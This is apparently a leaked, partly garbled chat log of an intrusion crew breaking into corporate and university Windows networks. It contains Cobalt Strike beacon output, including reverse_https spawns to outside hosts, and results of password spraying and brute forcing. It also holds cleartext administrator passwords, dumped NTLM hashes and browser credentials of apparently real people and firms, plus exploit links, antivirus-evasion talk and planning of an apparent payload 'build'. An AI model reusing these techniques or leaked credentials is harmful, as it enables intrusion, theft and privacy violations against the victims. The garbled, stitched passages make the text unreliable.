16/01/2021 11:06 396,372,097 BGUKHOVEEAM_2021-01-16_11-00-24.bco 17/01/2021 11:06 396,398,582 BGUKHOVEEAM_2021-01-17_11-00-23.bco 18/01/2021 11:06 396,424,953 BGUKHOVEEAM_2021-01-18_11-00-22.bco 19/01/2021 11:07 396,442,650 BGUKHOVEEAM_2021-01-19_11-00-11.bco 20/01/2021 11:06 396,456,968 BGUKHOVEEAM_2021-01-20_11-00-23.bco 5 File(s) 1,982,095,250 bytes 2 Dir(s) 19,409,371,136 bytes free ````CITYISLANDSVR` also only sofos+on dk? sitbelt also can`t detect no red at least on these ``` bally44hodc1 bgukhoveeam if there's really only sofos there, then octam red check on googleogleogle psedr_query you can't determine everything once again [+] Determining what EDR products are installed on BGAZRDC01... [+] host called home, sent: 358 bytes [+] No EDR products found! Operate at your own risk! [+] Determining what EDR products are installed on BALLY44HODC1... [+] host called home, sent: 60 bytes [+] No EDR products found! Operate at your own risk! ``` and no EDR products are found on DK. Determining what EDR products are installed on WEBMARSHAL... [+] host called home, sent: 359 bytes [+] savonaccess.sys Found [+] 1 EDR Products Found! ====================== | Vendor Information | ---------------------- [+] Sophos Found! |"Tell me right away what AV is on the servers. DA: BALLYMOREGROUP\Administrator K33p1ngIT53cur3!? BALLYMOREGROUP\CITAdministrator L0ndonT0w3r2009! BALLYMOREGROUP\bespadmin drithEyuDAZ07ac Username : BALLYMOREGROUP\admin Domain : 192.0.2.3 Password : -6&J{*n]e73e]Mm 192.0.2.3:445 192.0.2.3:443 192.0.2.3:80 Username : BALLYMOREGROUP\admin Domain : 19.2.0.25 Password : Complete2! Pinging 19.2.0.25 with 32 bytes of data: Request timed out. 100% loss `````` 192.0.2.3 admin -6&J{*n]e73e]Mm 192.0.2.25 admin Complete2! 
``` sat sat sat in chat help @user4 went to offdocked putlibslimeyvpn knocked out sit the fuck down to look for cars without sofosatam better yet work through it look for vpn`BALLYMOREGROUP\bespadmin drithEyuDAZ07ac```` ====== AntiVirus ====== Engine : Sophos Anti-Virus ProductEXE : C:\Program Files (x86)\Sophos\Sophos Anti-Virus\WSCClient.exe ReportingEXE : C:\Program Files (x86)\Sophos\Sophos Anti-Virus\WSCClient.exe Engine : Windows Defender ProductEXE : windowsdefender:// ReportingEXE : %ProgramFiles%\Windows Defender\MsMpeng.exe ``` ``` [+] Determining what EDR products are installed on localhost... [+] host called home, sent: 58 bytes [-] could not open \localhost\\C$\windows\sysnative\drivers\*: 3 [+] No EDR products found! Operate at your own risk! Tell me what's changed first. The passwords have been changed. mimic has been disabled in some places and it works and crashes the session where it has not been disabled sessions die from almost everything (request dir remote/start the case) like russian roulette in essence us which is 192.0.2.3 was either knocked out or moved to another address@user7 niceadd.com quite enoughtostay yourself from 5 to 10 if you have active sessions of 10 + there slip for 10 minutes not to spam Leave not many sessions good night do not forget to clean the files sleepy night 150slip happy sessions in slip to monday cheers well done everyone thank you +))) tell more @user3 not to be late Mon by 10 am start closing da, lets do so by 10 am probably they will have an hour at night. do you want it by 10 or on the morning of pnc 4-5 at night on pnc? tomorrow by 6 there is no sense to go on a working day in general such things on the desktop, more shortcuts to disks how to find it? where? on the desktop? chanson mdb database where did you find it? yes we did? if you found access to the center by what time? 
well, then me and @user8 no sessions( ``` >lastLogon: 132304000305532732 ``Look up when did he even log in.`` maybe a long time ago is unlikely)mb he had a lockout on 1 try? well, if you do not lock it specifically, it is unlikely you have locked it)) do not worry)0 in hell info can look at the polzak there is a question of how much badpasswordcount, or in hell info[ ](https://mediaeveryone.com/group/vpinc-net?msg=ooEe2x6qAW8HRqN6A) have not look at the users can look in hell it? it means that he is locked before, locked just now or at another attempt to be locked `` `` Account lockout detected ``I don't understand that conclusion. It's probably not locked but ``was'' locked. [-] 10.100.1.101:445 - 10.100.1.101:445 - Could not connect 2 mina lol, session broke down this one broke down all fails with this password let everyone in yes just if you didn't exactly brute force this user or something like that you had nothing to do with it, kznm ``` [-] 10.100.1.101:445 - Account lockout detected on 'jonb', skipping this user. kerb is not brutalized yet kerb is probably not going to hit anything if it doesn't work for yes or other service you can try but in general you're right and it's more serviceable can SharpSpray run with this password?))nsupport ;))alas(`` [-] 10.100.1.101:445 - 10.100.1.101:445 - Failed: 'orange_fact\Svc_ADSync:Sync!T4u', Try that one tooSvc_ADSync might work because it's a service account see if there are other users in the domain with the Svc_ prefix. because the name of the account ends with the phrase from the passwordIn fact, you can just do smb_login to check if someone from the domain admin has such a password. what is the profit of autobrouting here? ``` [-] 10.113.1.126:445 - 10.113.1.126:445 - Failed: 'orange_fact\Svc_CRMailSync:Sync!T4u', ``Try smb_autobrute on this pass, it turns out it has no LA rights anywhere, right? I guess this Svc_CRMMailSync doesn't have a wheelbarrow. 
```
beacon> net domain
[*] Tasked beacon to run net domain
[+] host called home, sent: 231 bytes
[+] received output:
vpinc.net

beacon> shell whoami
[*] Tasked beacon to run: whoami
[+] host called home, sent: 37 bytes
[+] received output:
orange_fact\color764
```

aahhhh, that's what I told him without the domain.) it's just that their domain is vpinc.net and whoami shows the other one, what did you check it with by the way?

Credentials (table columns: host, origin, service, public, private, realm, private_type, JtR Format)

why would he have the correct username/password? You'll still get it checked at LA with domain? orange_fact\Svc_CRMailSync:Sync!T4u How do you run it? Almost all the hosts have been through, but none with "admin" tagged on them. Any success?
```
Global Group memberships *Domain Users
```

Let's see what groups he's in, `net user Svc_CRMMailSync /dom` oo great.

```
[+] 10.100.1.63:445 - 10.100.1.63:445 - Success: 'orange_fact\Svc_CRMMailSync:Sync!T4u'
```

Are there any kerbs from here? Check to see if the pass is valid?

```
dn:CN=Svc_CRMMailSync,OU=Orange City,OU=Service Accounts,DC=vpinc,DC=net
>objectClass: top
>objectClass: person
>objectClass: organizationalPerson
>objectClass: user
>cn: Svc_CRMailSync
>description: Service Account for CRM Mail Sync in O365
>givenName: Svc_CRMMailSync
```

:thumbsup: from what - it's not clear hashes are there

```
\\10.100.1.89\ldlogon\LDHashDir
```

```
LicenceNumber: 1AF8-140128-081558
Serial Number: 1AF8-0004B3-28D9DE3B
```

Then go through the ones that are available - crawl with your hands, look for pvsh bat scripts of all kinds vot full in the past highlighted interesting and already scanned everything? so few cars? as well as c$ admin$ there is nowhere except his output yes? `shell SharpShares.exe shares > shares.txt` Works check in lab, i don't chekalon through shell windows won't open any? and stop if dropped? i think not(but through `>>` won't work? alas no SharpShares output to file? :man_shrugging: but what could you block it with?

```
beacon> shell net accounts /dom
[*] Tasked beacon to run: net accounts /dom
[+] host called home, sent: 48 bytes
[+] received output:
The request will be processed at a domain controller for domain MandKLaw.com.
System error 5 has occurred.
Access is denied.
```

We must have blocked it...

```
beacon> shell net user panderson /dom
[*] Tasked beacon to run: net user panderson /dom
[+] host called home, sent: 54 bytes
[+] received output:
The request will be processed at a domain controller for domain MandKLaw.com.
System error 5 has occurred.
Access is denied.
```

I'll start it. And SharpShares? on a working session just killed it just did not work - hangs with what error? crashes process did you run it online?
+ cleartext creed no under skul and 17-010 yesterday tried that's it, it's gone. farm is still off?

```
[*] tasked beacon to spawn (x86) windows/foreign/reverse_https (slypad.com:443:443)
```

passnulnet, 15 hours ftp exploits here is not the best solution and hardly a working session? found ldap and pointed it in the batken how to do?) me in the chat there is not a nickname)( @user9 here in bellymore who will stay here? there's one left for work, i'm still digging around at least have you cleaned the bash behind you? there's one lin with ssh access, but nothing good to come out of there either, no way to move forward so far, no way to do anything here?

```
[+] 172.16.200.24:445 - 172.16.200.24:445 - Success: 'snu\alangvardt:Crimson24!
[+] 172.16.200.59:445 - 172.16.200.59:445 - Success: 'snu\alangvardt:Crimson24!
[+] 172.16.200.55:445 - 172.16.200.55:445 - Success: 'snu\alangvardt:Crimson24!
```
```
[+] 172.16.200.50:445 - 172.16.200.50:445 - Success: 'snu\alangvardt:Crimson24!
```

private part of the nixam 600+ ips was rasskandy already understood the old session is out kst if you do not know, logging in under the account of two at the same time can not go there I did not go, I can not tell you and most likely logging in under vpn https://mediaeveryone.com/group/snu-edu?msg=usQ55fv2NeQYzKhZC I even hz where you login) ie here ok? I have doubts) and what's the difference they just have some function apparently a it staff kirase 3-4 saw here should be ZEWS there more was met already) are used by some software that works as AD factories)))) there are names servo kvig saw more tanos in what the scanner, loki

```
[+] 172.16.200.67:445 - Host is running Windows 10 Education (build:18363) (name:THOR) (domain:AD)
[*] 172.16.200.100:445 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.16.200.100:445 - Host could not be identified: OS400 V5R4M0 (iSeries Support for Windows Network Neighborhood)
[*] 172.16.200.74:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{8812df22-8cb9-43ac-b0c3-2a9815aac072} (authentication domain:AD)
[+] 172.16.200.74:445 - Host is running Windows 10 Education (build:19041) (name:LOKI) (domain:AD)
```

Why all of a sudden? @tl2 isn't it a juice or testlab?
so you can import it yourself and I'll send you more info from AIS so you can work with it by hand but there's no tpsh) yeah I didn't go there conmille the same thing but you can check other versions yourself there 2003 x2 I poked there with standard msf ms17 and python from git, both bypassed
Anyone who has problems with dedicas - come to me :sunglasses: for questions to @user8, he is a guru in this
I'll send you a scan of the network
Valid account, log in under it and download the client for vpn
Acquired.
Taken.
3 out of 4 sorted out?
+@user8 there you got 2 more sessions from that netchat - orenco.com.telecomlabsinc.com
input coba, went sessions: first took 2, did not take 3, took
https pick up yourselves, 4 pieces ready, I'll give them here and you disassemble them yourself, just write down who picked up what on the new; sootv pulling from the input above; the grid in the work to finish on the old
and another announcement, you koba update http://github.com/nccgroup/nccfsas/tree/main/Tools/SharpZeroLogon
input coba
https://www.exploit-db.com/exploits/48537
well, in general you should look for additional vector and additional task to find this case) in the rep lies only in the rep and the folder in the folder which he opens lies in the folder ëèosalvot here pay attention to the gif https://github.com/danigargu/CVE-2020-0796
:thinking: but i need to look and there is another option with rce) like on the ms17-010? for goost need a session, no?
and one more thing, about dead spots, did you do scans on the smbgost?
and today put the build
yes, ok, let's do a story there and gather information on the offsets avera)
but i was there yesterday, i don't know how to check it but i don't know if it's critical, the scale is small and looking for ways to unscramble it)
ok then solve the problem with EDR on all servers
there are pinged +- 100-80
252 machines without a server
how many users? 0 Objects returned
are there any trusts? 20 pcs.... seriously?)
file already if there is not enough buffer length let's make it clear at once that if it fits in the message - write in the message
How many servers are there in total? If there are not many you can try to shut down AV by hand, collect analytics on this and we will start with the number of servers. These are most likely the most critical of some
@user3 found malware and bitdefender on itc-us.com servers
had 4 servers? Or am I confused with another one?
Using GPO for Deployment. To install SecureAnywhere using GPO, you should have experience with Microsoft's Active Directory and the GPO editor. You can also watch a video on how to use GPOs at How to Deploy Using Group Policy - SecureAnywhere Business.
To install SecureAnywhere using GPOs:
1. From the following location, download the SecureAnywhere MSI installer to a network share: http://anywhere.webrootcloudav.com/zerol/wsasme.msi Downloading the file makes it accessible to all endpoints on which you will deploy SecureAnywhere.
2. Go to the server that is the domain controller for the deployment group.
3. Open the GPO editor on the domain controller and create a policy for the deployment group.
4. Assign SecureAnywhere to all endpoints that belong to the Organizational Unit where the Group Policy is created.
SecureAnywhere installs on the endpoints in the group when they restart.
Two hours we work with these, then there will be new sessions
Good afternoon
its-us.com - have
pkgprod.com - are
what about the sessions? :flag_il:
Good morning, good night to you all
All right, then we start at 3, the amount of work for tomorrow does not change
I only get out of bed at 14
I think that from now until tonight you have time to prepare the networks for the build
I do not understand, is it convenient for you and you sleep before that time?
can even earlier
Why at 14?
Write to the group on the current networks status; tomorrow we need to have two networks ready for the build, tomorrow by 14:00
still an hour working
saw a shortcut on your desktop on the web, something to sol ...
they seem to have such a system, but it also needs creeds))))
I'm not saying that it does not work at all
do not save access to avs in browsers, but in password storage systems?
keylogger koba* in sprouselaw from malware account
keylogger and got it worked at all?
keylogger koba itself is not the most working option
in the working except for keylogger, it turns out?
they don't save the credentials from av in chrome anywhere
keylogger put today on a bunch of machines, as a result keystrokes - roam-away-field
as an option - access only in working hours
I've already gone through a shitload of machines (where admins sit), no access from anywhere, it seems there are backups going to the cloud
if admin not found
How to look for cmd version disable on servers, etc in other networks?
no about that
we did not find the av, admin or do you mean the other?
build
what build?)
today we have time to put the build?
I have already offed the session
this is the account for the ASP.NET, most likely only used when installing it or something like that
no user
[-] 10.7.0.199:445 - Account lockout detected on 'ASPNET', skipping this user.
The account is disabled. What is it?
ASPNET is blocked everywhere (I've taken dumps everywhere)
no
yes(
found another LA and microadmin, check them out
yes, in the process you still need to remove the hashes everywhere
+ these are the servers as I understand it? check everywhere we can move
now they are citrix hosts if i understand correctly
Checked the process at all and a couple of hashdumps removed
no
yes and LA (most likely) everywhere the same(
was the mikehashdump taken off?
it's weird, everyone's got the same fucking password
+ dll in place?
Log from biconadai command to launch - fixed?
you have YES?
user9@tl1 add
@user9 here i yanked it from the browser yesterday, i thought it would fit
this from kerb?
the creds are not valid (
+ there came?
put the load
pokaem
1 min
@tl1 pulse session please
://phanein.televisa.com.mx/vpn/logout.html
b through the push configured then(
Does not come to his mail on mail
#1-done-crispregional-org what?
the other one's in work, i'm watching this one out of the corner of my eye while the other one's in work
i'm waiting till it's on, when it's on i'll jump right away, i have everything ready, this is just a screen, is the VPN off in the domain?)
as mantra dont forget sessions in slip
everyone good night, then until tomorrow by 7
and go on vacation then
finish tomorrow
you are tough)
so far the stats look like this
+ this is the domain where we are
TECHNISTONE.LOCAL - can't get through, no overlap of users and users/groups from other domains with rights
WI.RWP.COM is some kind of a dead domain, just win 2003
WILSONART.COM +
CN.WILSONART.COM +
RALPHWILSON.COM +
ARBORITE.COM +
POLYREY.NET +
EU.WILSONART.COM +
UK.WILSONART.COM +
BUSHBOARD.CO.UK +
SLF.LOCAL +
RESOPAL.LAN +
TECHNISTONE.LOCAL no intersections
WI.RWP.COM 2003 mb old/inactive domain
POLYREY.COM Quarantined
RESOPAL.GER Quarantined
found avs, backups, spheres and creeds
to us region
left backups/spheres in europe
Give me a brief report on the work so that
All resurrected
Keeping up to date
Support is still not returning calls
@user3 contacted support, waiting for a response
again?)
Our internet failed)
0.dead.forestriverinc.com
What happened here? user5
>sAMAccountName: TIMECLOCK41$
>operatingSystem: Windows 8.1 Pro
put the server sabinet on the 445 port
as I'll look at the rest, maybe I missed something there
only 301 tachksts no?
ok, it's a deal then I'll help you here as much as I can there
+ you work with me in the mouth?
give 5 minutes
now quickly sort out the servers and prepare it, it's not yet clear what the cost here
how much?
umm...
i don't even see it, i'll re-scan it, it's a tool changer, i can't see the trusts file
well not visible yet) no trusts?
I will first subdata on the domain then yank dxinx immediately
here progress on the tasks but at least you will know that there is something nearby, just do not get there
if something will find, most likely will be restricted domain in another forest or something like that
yeah, there is a feeling that other networks should be where tonya
445 po put a scan from the current subnet on /16 mask
strange, trusts were not and all servers) well in adcom they -42 total net small however
Portscan on the computers that are visible (15 pcs) on these ports
bad of course ...
and then as if the account is abandoned, because there are no files
it apparently only works through the web
yes, this is in the plans to do now
brazers no, but what is the current use there on the pc?
in mssql you can put the brute force
would be a, patched services mssql
and so the same zerologon option?
there are several such exploits, but I have not attracted it and in sharp or c there is no them (and in c they are always fallen)
ah, well, only 2020-0796
vertical within the current pc)
I do not understand a little bit what it means within vpe)
within vredlere exploits?
did not understand)
I mean lpe -> vredlere
smbghost, msf did not draw it
tried?
on gpp empty, but I have not collected the dictionary because I haven't used the browser here) and passwords are nowhere else in fs
something by the way on gpp? collected from browsers?
mm-hmm, so you can brute force without lockout
Minimum password age (days): 1
Maximum password age (days): 42
Minimum password length: 7
Length of password history maintained: 24
Lockout threshold: Never
Lockout duration (minutes): 30
Lockout observation window (minutes): 30
Give me a password policy
no? there are a few 2008
yes, there are some servers lol) 2003, hp?
skilkerb
there are no passwords in users
mm, but yes one... in users there is what?
but it does not lada
MCLOUD-SH32-6.mgrmedu.com
your current one?
He's a dense one, but he's not
sharfinder.
Global Group memberships *MCLOUD-PORTAL-PINSTU *MSSO-POHS363 *Domain Users
Whether or not I run the tools from the toolkit, by the way, does it have any privileges?
If output to a file - I throw in a new session - the files are there but the tools work?
same) psinject? lazagne.exe adfind also kicked out the session after it worked out
execute-assembly?
you have coba attached?
only windef in your processes
which av?
no luck yet i couldn't find the credentials. no user anywhere
sessions are dropped after you run any tools like sitbelt, etc.
and what tools did you run?
I can't believe this is happening.
+ tout flylodem put the same shel
session dropped
the cartel assembly
just noticed that the top of the whole line is his name
The Pink Panthers cartel criminal thunderstorm like a stranger looking right into my soul (c)
Looking for credits from the sphere and avv #wilsonart-com so far nothing...
of the current crits no admin, no vulnerability on ms17/netapi, at least on the servers, GPPP does not give anything, orb no
quietly
how are you doing?
ok
#alloypolymers-com preparing to close, divide themselves on both networking
all hello, I will be late tonight and while I will not you work on #wilsonart-com and #alloypolymers-com
ok, good night
a, tomorrow by 6
to what time?
good night to all
thank you all for tonight) and until the end of the week for sure #wilsonart-com and tomorrow according to the plans of @user3 network for the closing
join me
fast, coherent, accurate
First I'll tell you that you're great, very good work
give 10 minky
Andryukha we have a case, maybe close all the knights?
+ here all `missme.com` move on
Yes I'm watching the half eye ...
and I said that did not come
Well personally you ask me, I do not do balimore, what's it to me?
It's strange that the fix on the polzac, when the servers jumped the hell knows when
@user4 ?) have not thought of that?
you can already think that you can search for login through passwords
vpnUsers
you probably know ip vpn
I'm what you have ad infos, you have dsink
and you?)
then what do you mean by "accesses"?
accesses above in the conf, no password and you can't find accesses from vpn
A what's up with the polozack?
what's up with vpn off?
[--- Listable Shares ---] ADMIN$ C$ print$ Shares for NDDEVSPARETECH1: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$ Potential targets in NDLEADING unlikely of course, they changed passwords YES on 21-22 and there are only two check this one in LA but check this password on other L.A.C.s TJ:1001:aad3b435b51404eeaad3b435b51404ee:e5c3bb4d14467ce9d23a46ea650f0012::: ---- carrington123 ``there's still a shitload of linuxes we could get into and where is 445 open and there are only 10 npc in it? all within the same oushka and no access there and 1 server one we see 3 user subnets and we can go anywhere there on the server subnet have you checked where? first two no, third user8 I think I checked and it doesn't work either and 4 do not remember check if they do not open us new cars? Administrator:500:aad3b435b51404eeaad3b435b51404ee:12bd62ad7e74da42794b82f59d3c18ee::: jason:1002:aad3b435b51404eeaad3b435b51404ee:c06bbf80fa38c366ca3803b9e922bdd4::: LEADMIN:1004:aad3b435b51404eeaad3b435b51404ee:dbc1746c544b6621dba9fa0a1eeb7fdf::: TJ:1001:aad3b435b51404eeaad3b435b51404ee:e5c3bb4d14467ce9d23a46ea650f0012::: ``one domain microadministrator seems to have one and you didn't take off the clear pass? 
right, we rem sap has different passammmms la ``` Administrator:500:aad3b435b51404eeaad3b435b51404ee:12bd62ad7e74da42794b82f59d3c18ee::: jason:1002:aad3b435b51404eeaad3b435b51404ee:c06bbf80fa38c366ca3803b9e922bdd4::: LEADMIN:1004:aad3b435b51404eeaad3b435b51404ee:dbc1746c544b6621dba9fa0a1eeb7fdf::: Remote Support:1003:aad3b435b51404eeaad3b435b51404ee:5ce89fa1e9148477eb5d6aa455c2d494::: Remote Support:1002:aad3b435b51404eeaad3b435b51404ee:0a564fe23c310f2850166ee68647928f::: Remote Support:1003:aad3b435b51404eeaad3b435b51404ee:e4205612428e614cda5b5f82a6346771::: Remote Support:1002:aad3b435b51404eeaad3b435b51404ee:e998f2240a4dce990f99bcfccd7f3d9c::: Remote Support:1002:aad3b435b51404eeaad3b435b51404ee:c41814b44449d1944c1ef51a80384d36::: Remote Support:1002:aad3b435b51404eeaad3b435b51404ee:e8e7a6d162f5dbde58a9065a44140834::: Remote Support:1002:aad3b435b51404eeaad3b435b51404ee:1c0bbc2448c9d2fdf45389c83cdc124f::: TJ:1001:aad3b435b51404eeaad3b435b51404ee:e5c3bb4d14467ce9d23a46ea650f0012::: ``We found yesterday that the servers (not DK) have the same LA, but we haven't been able to unroot yet ``` SMB 172.31.190.66 445 JDOCHSVC12 500: JDOCHSVC12\ZEUS (SidTypeUser) SMB 172.31.190.66 445 JDOCHSVC12 501: JDOCHSVC12\_guest (SidTypeUser) SMB 172.31.190.66 445 JDOCHSVC12 513: JDOCHSVC12\None (SidTypeGroup) SMB 172.31.190.66 445 JDOCHSVC12 1000: JDOCHSVC12\WinRMRemoteWMIUsers__ (SidTypeAlias) SMB 172.31.190.66 445 JDOCHSVC12 1002: JDOCHSVC12\Direct Access Users (SidTypeAlias) SMB 172.31.190.66 445 JDOCHSVC12 1004: JDOCHSVC12\Anonymous (SidTypeAlias) SMB 172.31.190.66 445 JDOCHSVC12 1005: JDOCHSVC12\Message Capture Users (SidTypeAlias) SMB 172.31.190.66 445 JDOCHSVC12 1007: JDOCHSVC12\CtxAppVCOMAdmin (SidTypeUser) ``` ``` SMB 172.31.190.17 445 JDODHCP02 [+] Brute forcing RIDs SMB 172.31.190.17 445 JDODHCP02 500: JDODHCP02\ZEUS (SidTypeUser) SMB 172.31.190.17 445 JDODHCP02 501: JDODHCP02\_guest (SidTypeUser) SMB 172.31.190.17 445 JDODHCP02 503: JDODHCP02\DefaultAccount 
(SidTypeUser) SMB 172.31.190.17 445 JDODHCP02 513: JDODHCP02\None (SidTypeGroup) SMB 172.31.190.17 445 JDODHCP02 1000: JDODHCP02\DHCP Users (SidTypeAlias) SMB 172.31.190.17 445 JDODHCP02 1001: JDODHCP02\DHCP Administrators (SidTypeAlias) SMB 172.31.190.17 445 JDODHCP02 1002: JDODHCP02\Direct Access Users (SidTypeAlias) user@user-tobefilledbyoem:~$ proxychains cme smb 10.99.194.151 -d jdossn -u nddevbernst -p Tractor20! ``` It looks something like this we'd love to)let's try to get in deeper and get a foothold there todayYes. They seem to be rebuilding the grid. There's new computers. I thought there was some progress, huh? * Username : ndcartleich * Domain : JDOSSN * NTLM : ee0907810044b786f7b5504842161191 * Username : ndcarrtedro * Domain : JDOSSN * NTLM : c9e553f47018e2be97ec3307bd47df25 * Username : ndcarjjohns * Domain : JDOSSN * NTLM : ecb13250eceddc92b4f7f081f02f8685 * Username : ndcarjegger * Domain : JDOSSN * NTLM : ecb13250eceddc92b4f7f081f02f8685 * Username : ndcarhsherm * Domain : JDOSSN * NTLM : 0f1ffe1daf861353d1e2461538531635 * Username : ndcardkolst * Domain : JDOSSN * NTLM : b9b6aa1456c1a351844910877a487cf9 `````` * Username : ndmictflana * Domain : JDOSSN * NTLM : 7bba5ae0ee513a322b7cf6b8768bb063 Strange that all functions are affected I can not tell all by myself I will try to spawn from another user from another car) it as spawn did not help work through remotno I would try respawn try cmd substitute what rights to you? beacon> spawn vew [*] Tasked beacon to spawn (x86) windows/foreign/reverse_https (hitark.com:443) [+] host called home, sent: 840 bytes [-] could not spawn C:\Windows\syswow64\wusa.exe: 740 Try to spawn a new session only one (on one server), nothing to move on all sessions? The same crap on execute-assembly... it doesn't matter what to run... 
I copied this piece from an attempt to run portcan this what for? why do you need this server? ``` [-] could not spawn C:\Windows\syswow64\wusa.exe: 740 [-] Could not connect to pipe: 2 ``Check through rubeuswow on theoretically related servers ticketpngc - all the credentials are valid, but no one has rights. there are 21 cars on the network and it's servers. Inway is not catching anything yet. The impression is that they all work through RDP. In addition, they seem to be all virtual machines (but not sure yet - I am checking) #pcsb-org no access to neighboring domains ports are being scanned, morphs are being checked for nasa and other things @user7 and i'm digging tvs what are your current tasks? for now what do you have to work with? are there any new networks coming today? hi:man_raising_hand:is the internet working? hi:space_invader:everybody hello there!!!!`` RAJA-9298::ZOHOCORP:b3bd81e12761c973:76647c5c0cb37ce1c766147e15568b0b:Niji@1302. ``We've set up a timeserver, let's try to pierce through it. 
FortiClient -- The Security Fabric Agent ======= ra-2ji1 `````` FortiClient -- The Security Fabric Agent ======= rajanij132 `````` ManageEngine Password Manager Pro - Mozilla Firefox ======= ampaso19 ````WINONA\TOM abcabc4`https://vc1.rtpco.local/,https://vc1.rtpco.local/websso/SAML2/SSO/vsphere.local,10/22/2019 9:50:32 AM,13216229432847862,winona\tom,abcabc4```` --- Chromium Credential (User: TOM) --- URL : http://home.rtpcompany.com/Account/LogOn Username : winona\tom Password : abcabc4 --- Chromium Credential (User: TOM) --- URL : https://us.sso.covisint.com/sso Username : tkoenig Password : GreenTan123 --- Chromium Credential (User: TOM) --- URL : https://us.sso.covisint.com/sso Username : TKOENIG Password : GreenTan123 --- Chromium Credential (User: TOM) --- URL : https://kaseya.rtpcompany.com/vsapres/web20/core/login.aspx Username : tom Password : Passw0rd! --- Chromium Credential (User: TOM) --- URL : https://www.myhealthevet.va.gov/mhv-portal-web/anonymous.portal Username : tkoenig5 Password : xyzxyz8? --- Chromium Credential (User: TOM) --- URL : https://www.myhealth.va.gov/mhv-portal-web/home Username : tkoenig5 Password : xyzxyz8? --- Chromium Credential (User: TOM) --- URL : https://mail.rtpcompany.com/Login.aspx Username : tkoenig@rtpcompany.com Password : PDLPDL7 --- Chromium Credential (User: TOM) --- URL : http://hyperic.winona.rtpco.local:7080/j_spring_security_check Username : hqadmin Password : rtprtp1 [*] Finished Google Chrome extraction. [*] Done. ````https://vc1.rtpco.local/websso/SAML2/SSO/vsphere.local `10.4.0.223 `https://vmwaremgr.winona.rtpco.local `How are you doing? Do you have time to close today? It's okay, we can distribute it quietly and make it in three trusts200 pcsWait, not much. and servers? I have not counted yet, about 2000 machines? [DC] 'us alloyp'. 
[DC] 'us.alloypolymers.com' will be the domain [DC] 'GAHDC01.us.alloypolymers.com' will be the DC server [DC] 'winona.rtpco.local' will be the user account ERROR kull_m_rpc_drsr_CrackName ; CrackNames (name status): 0x00000002 (2) - ERROR_NOT_FOUND $krb5tgs$23$*jerickson$rtpco.local$MSSQLSvc/Web4.winona.rtpco.local: Colorado04 ``Till tomorrow)`` do you thank you, see you tomorrow)``Don't forget to clean up after yourself,`` Thank you all, good night)`` So, well, that's it. Today that's all, throw the session in the slip for 100 seconds +-, tomorrow we will continue) when trying to load a non-formed file writes an error (>4Gb) When you remove the ad info, remove the entire, all 6 files and download the same 6 files in the confab) Files over 50 meters are archived. Files over 200 mb in a compressed state are not downloaded through the cobaDon't forget to delete files created in the process of running commands! Today up to 12 daTo the second group alsoTry to work with her, maybe there faster copeIn the first group coba new session `` [*] Tasked beacon to list processes [+] host called home, sent: 12 bytes [*] Process List with process highlighting [*] Current Running PID: Yellow 892 [*] Explorer/Winlogon: BLUE [*] Admin Tools: LIGHT BLUE [*] Browsers: GREEN [*] AV/EDR: RED ````.` .\[text\]\[text]\[qqq\]\[\url{https://katex.org/}\]sessions are gone༼ つ ◕_◕ ༽つ and what about the task?\{\a'\a'\underline{you yo piraka} doesn't work)\overgroup{Ingeborge Dapkunaite}{and how katya works\overgroup{Ingeborge Dapkunaite}? The mistakes of youth were easy to get away with. Ah, youth, - the magic sound of a whistle. We often sawed off the bough beneath us. Now we are not the same, and the bitches have grown old. ``Thank you at the very bottom of the field``vfhrth````` `````` right here) `````'marker 123 007user1 - charmer, he has a message for me in a personal) + + in pm does not leave a message++All here? 
hahaI'm cheerfulGreat, who is not with us yet? Let them write in the slack works like everythinghttp://joxi.ru/D2PNv3QUJB5qNrI got a message, but to read it nowhereNo access to the PM we have the rights are cuthttp://joxi.ru/823GVzpTru/823GVzpT8a06L2+1 white screen with all white+also white screen can not? in slek otpisiteen not fit the passwords at 3hi not all can enter-no one came personal messages? also white screenThere is nothing at all also no field to enter a message? I have a white background, no one personally with me does not open? user8 about this, https://mediaeveryonecom/account/security - encryption E2E and reset the keyI can not write in person, please make me a human nickname Stalinnu me and the user is goodI do not understand what encryption password is required of me if you want uniqueness - nicknames in private) +++ got the open kmd but still can not pull in the cob, but managed to pull in ptsh, tomorrow will get all the information and will be untwisteddatax there's a flag -keep, when it gathersaablocks the session process kobydelka new not deleted whytomorrow by 3pick up, sessions in slipskoronu already 12takte guys you threw, no LA-parole not found the LA - admin and tsun-tsunetdo system does not risea, there vpn offu me in koba session what did not help?in tpsh did not fly? psh did not help? yes it's from here? a few pieces i threw out it ...? give me a screenshot of the lk without a VPN have anything to work with? ``` http://citrix.peptide.cn/citrix/xenapp/auth/login.aspx ``` ipn: Sage i have no configs, i've tried everything manually, then i went through SauronEye, it's empty now i'll try it. i thought you were asking about arma or servda) fuck, you mean armitage ? 
only arma is available, i can't pull it there try to pull arma, win 10 now i'll try again in pts and arma ? that's my problem this thing was on tasks@user7 you have what on tasks was before? still the same - need to build a dll then to mebug tpsh because of socket chokeOrrnOvOvOrnOvOr three times I have not come to him either I read my mind or more details for the question what is the ptsh?who needs to bild the shellcode to @user7@user7 was ready to volunteer not raised the sessionWhy? i need a volunteer can generate a new dll? i launch, the process hangs, but the session did not come dll? i can not draw in the coba and ptsh, kmd is closed but opened, does not let you run any exe file today till 12soglas, in the personal areaa did you order?) do not forget to make me an account in ptsh) check ipn and other things `` beacon> shell net group "Domain Admins" /dom [*] Tasked beacon to run: net group "Domain Admins" /dom [+] host called home, sent: 61 bytes [+] received output: 这项请求将在域 WORKGROUP 的域控制器处理。 发生系统错误 1355。 指定的域不存在,或无法联系。 ``` This request will be processed on the domain controller of the WORKGROUP domain. There was a system error 1355. The specified domain does not exist or cannot be contacted. beacon> net domain [*] Tasked beacon to run net domain [+] host called home, sent: 257 bytes ``Domain is not responding there is a session in cobepop)`` on the external domain since they even have passwords repetition the internal one is the same? http://citrix.peptide.cn/citrix/xenapp/auth/login.aspx What domain did you have? Check if there is a pschhe I typoed or what? 
